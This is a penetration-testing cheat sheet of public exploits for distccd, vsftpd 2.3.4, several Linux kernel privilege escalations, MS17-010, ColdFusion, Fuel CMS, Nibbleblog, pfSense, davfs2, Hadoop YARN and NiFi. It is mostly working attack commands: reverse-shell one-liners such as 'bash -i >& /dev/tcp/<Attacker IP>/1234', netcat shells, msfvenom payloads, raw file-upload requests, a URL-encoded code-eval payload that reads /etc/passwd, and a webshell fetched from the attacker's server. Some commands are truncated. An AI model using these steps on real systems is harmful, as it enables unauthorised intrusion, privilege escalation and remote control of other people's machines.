Public Exploits

distccd v1

nmap --script distcc-cve2004-2687 -p 3632
nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 4444 -e /bin/bash'"
python -t -p 3632 -c whoami                                         
[OK] Connected to remote service
--- BEGIN BUFFER ---                                                                                                                                                                                                                       
--- END BUFFER ---
[OK] Done.

VSFTPD v2.3.4

nmap --script ftp-vsftpd-backdoor -p 21
#Manual Exploitation
telnet IP 21
USER user:)
PASS pass

# Check if Port 6200 has opened.

Kernel Exploits

Linnux 2.6.32 < 3.x (CentOS - x86)

cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c 
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542

Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04)

  • Requires:

    • PID of Udevd

    • Create /tmp/run. Exploit will run /tmp/run file

      cat /proc/net/netlink
      sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
      dcc4be00 15  2687   00000001 0        0        00000000 2
      ddf0dc00 15  0      00000000 0        0        00000000 2

Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation

#Tested on x86 - Linux 3.0.0-12-generic
gcc mempodipper.c -o espriv

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW'

gcc -pthread dirty.c -o dirty -lcrypt

#Or ./dirty my-new-password
su firefart

#Or ssh firefart@...


gcc Exploit.c -o Exploit -lcrypto

./Exploit 0x6b 443 -c 50

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)


  • Compile on local machine and run on target in case target does not have gcc.

Elastix 2.2


MS17-010 [Eternal Blue ]



git clone
pip install -r requirements.txt

#Identify valid named pipes
python <Target>

#Opens and SMB interactive shell. This may not always work
python <Target>

#Generate a Payload
cd shellcode
sudo ./

#Both x64, x86 payloads are generated. Select based on target arch.
python <Target> /shellcode/sc_all.bin


  1. Download since the exploit imports it. The download location is included in the exploit.

  2. Use MSFvenom to create a reverse shell payload.

  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload. [Guest :: <Blank password>]

Generate Payload

msfvenom -p windows/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

Exploit Modification

  • Modify these two lines for smb_send_file and service_exec.

    • Uncomment the lines

    • Add the exploit file to send

    • Payload to execute from the client side.

  • Add Authentication Credentials

    • 'guest' for anonymous login]

    • If the above does not work check with USERNAME = ' '

#Setup Listener

git clone
pip install -r requirements.txt
#Identify valid named pipes
python <Target>

python <named pipe>



Create Shellcode

  • -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" - The bad characters not to use. I got this from the comments in the python code.

  • -f py - Output in python format. The examples use c format, and just pasted it in slightly differently. Either will work.

  • -v shellcode - Have the code set the variable shellcode, instead of the default, buf. I want this to match what it’s called in the code I’m using.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Take this shellcode into the script, and paste it in replacing the default.

The exploit requires that I know the version of Windows and the Language pack:

Example: 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: 3 445 -- for Windows 2003 SP0 Universal
Example: 4 445 -- for Windows 2003 SP1 English
Example: 5 445 -- for Windows XP SP3 French (NX)
Example: 6 445 -- for Windows XP SP3 English (NX)
Example: 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
#Set up listener
python 6 445

ColdFusion 8


  • Grab the hash and crack it.

RCE through Scheduled Task:

  • Login -> Debugging&Logging -> Scheduled Tasks.

  • Scheduled task setup gives you the ability to download a file from a webserver and save the output locally.

  • Default Location Mapping from: > ColdFusion Mappings

  • Create a reverse shell and host it on our server.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp
python -m SimpleHTTPServer 80
  • Set the below task config:

    • Task Name: Shell

    • URL: Webserver hosting the JSP shell

    • Check the box for Save output to a file

    • File:C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

  • After submitting we run the task on demand under Actions.

  • Set-up a listener and browse to

| --- CVE-2009-2265 --- |

- RCE through File Upload:

./ <target ip> <target port> </path/to/payload.jsp>

- Manual Exploitation

POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exp.cfm%00 HTTP/1.0
Content-Length: 287
Content-Type: multipart/form-data; boundary=o0oOo0o
Connection: close

Content-Disposition: form-data; name="NewFile"; filename="exploit.txt"
Content-Type: text/plain

 %Exploit code%

| ---CVE-2018-15961--- |

Metasploit Module:

#Access uploaded file at <URL>/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 1832
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="file"; filename="shell"
Content-Type: text/plain

<Exploit-code in JSP>

Content-Disposition: form-data; name="path"


File Dislosure [LFI]

  • http://<url>/unauthenticated/..%01 * 40


Fuel CMS 1.4 RCE

Fuel CMS 1.4 is affected by a Code Evaluation + SQLi vulnerability that can be chained for RCE.

  • Use Burp to intercept as payload output will be found in the source code.


https://<TARGET-IP>/fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27<insert code here >%27%29%2b%27

For Example, within Burp: /fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami;cat /etc/passwd%27%29%2b%27

To get a Reverse shell:

  • wget http://<attackers-IP>/webshell.php -o shell.php

  • Set-up a listener & access http://<target-IP>/shell.php

DotNetNuke [DNN]

Nibbleblog 4.0.3



  • Login to nibbleblog: http://<IP>/nibbleblog/admin.php?controller=plugins

  • Upload PHP reverse shell: http://<IP>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

    • Ignore errors

  • Access webshell at default location:



  • Vulnerability arises because the '| ' character is not filtered.

  • Target URL:<URL>/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"


  • Admin credentials [Default admin :: pfsense]


  • Python payload - > Converted to octal -> Few characters removed to avoid errors - > Saved to temp file on target - > executed by target server in php [printf]

python --rhost --lhost --lport 4445 --username rohit --password pfsensepython --rhost --lhost --lport 4445 --username rohit --password pfsense

Davfs2 1.4.6 Local Priv Esc

#Find file storing Basic Auth credentials
head /etc/apache2/sites-enabled/000-default

#Set new credentials[Based on current encryption, use htpasswd / htdigest]
htdigest /<Location of Basic Auth credentials file> webdav newuser
#<Enter Password for newuser>

wget --no-check-certificate -O 28806.temp.txt
tr -d '\r' < 28806.temp.txt > 28806.txt
sed -n '40,73p' 28806.txt > coda.c
sed -n '84,90p' 28806.txt > Makefile
sed -n '101,192p' 28806.txt >
echo '#!/usr/bin/env bash' > /home/dave/rootprog
echo 'bash -i >& /dev/tcp/<Attacker IP>/1234 0>&1' >> /home/jolein/rootprog
chmod +x /home/dave/rootprog
chmod +x
echo 'kernel_fs       coda' >> .davfs2/davfs2.conf

#Set up listener on attacker host
nc -nlvp 1234

#Execute exploit on target
mount /mnt/dav/
#Enter credentials for newuser when prompted.

Hadoop Yarn RCE

#Check if API endpoint is available
curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

#Expected response
{ “application-id” : “application_1527144634877_20465”, 
“maximum-resource-capability” :{{ “memory” :16384, “vCores” :8}}

#Create a task(test.json) and submit via curl
curl -s -i -X ​​POST -H 'Accept: application/json' -H 'Content-Type: application/json' 
'http://ip:8088/ws/v1/cluster/apps' -data-binary @test.json
  • Contents of test.json

Apache NiFi RCE

python <Target IP> <Command>

Last updated